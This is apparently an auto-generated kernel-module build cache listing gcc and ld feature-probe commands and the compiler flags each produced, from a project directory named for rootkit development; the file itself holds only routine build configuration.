__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-falign-loops_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -falign-loops=1 18 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mno-80387";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mno-80387 19 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mno-fp-ret-in-387";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mno-fp-ret-in-387 20 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mpreferred-stack-boundary_3";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mpreferred-stack-boundary=3 21 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mskip-rax-setup";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mskip-rax-setup 22 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mtune_generic";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mtune=generic 23 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-funit-at-a-time";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -funit-at-a-time 24 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI__-mfentry_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"y";_else_echo_"n";_fi;_rm_-f_"_TMP"_"_TMPO" := y 25 | __cached_/bin/bash_./scripts/gcc-version.sh_-p_gcc := 070400 26 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_".cfi_startproc_n.cfi_rel_offset_rsp_0_n.cfi_endproc"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_CFI_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_CFI=1 27 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_".cfi_startproc_n.cfi_signal_frame_n.cfi_endproc"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_CFI_SIGNAL_FRAME_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_CFI_SIGNAL_FRAME=1 28 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_".cfi_sections_.debug_frame"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_CFI_SECTIONS_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_CFI_SECTIONS=1 29 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"fxsaveq__%rax_"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_FXSAVEQ_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_FXSAVEQ=1 30 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"pshufb_%xmm0_%xmm0"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_SSSE3_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_SSSE3=1 31 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"crc32l_%eax_%eax"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_CRC32_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_CRC32=1 32 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"vxorps_%ymm0_%ymm1_%ymm2"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_AVX_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_AVX=1 33 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"vpbroadcastb_%xmm0_%ymm1"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_AVX2_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_AVX2=1 34 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"vpmovm2b_%k1_%zmm5"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_AVX512_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_AVX512=1 35 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"sha1msg1_%xmm0_%xmm1"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_SHA1_NI_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_SHA1_NI=1 36 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"sha256msg1_%xmm0_%xmm1"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_SHA256_NI_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_SHA256_NI=1 37 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___ld_-m_elf_x86_64__-z_max-page-size_0x200000_-v__>/dev/null_2>&1;_then_echo_"_-z_max-page-size_0x200000";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -z max-page-size=0x200000 38 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-jump-tables";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-jump-tables 39 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-delete-null-pointer-checks";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-delete-null-pointer-checks 40 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wframe-address_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-frame-address";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-frame-address 41 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wformat-truncation_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-format-truncation";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-format-truncation 42 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wformat-overflow_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-format-overflow";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-format-overflow 43 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wint-in-bool-context_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-int-in-bool-context";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-int-in-bool-context 44 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-Waddress-of-packed-member_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-address-of-packed-member";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 45 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-Wattribute-alias_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-attribute-alias";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 46 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_-Wmaybe-uninitialized_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-maybe-uninitialized";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-maybe-uninitialized 47 | __cached_/bin/bash_./scripts/gcc-version.sh_gcc := 0704 48 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"--param_allow-store-data-races_0";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := --param=allow-store-data-races=0 49 | 
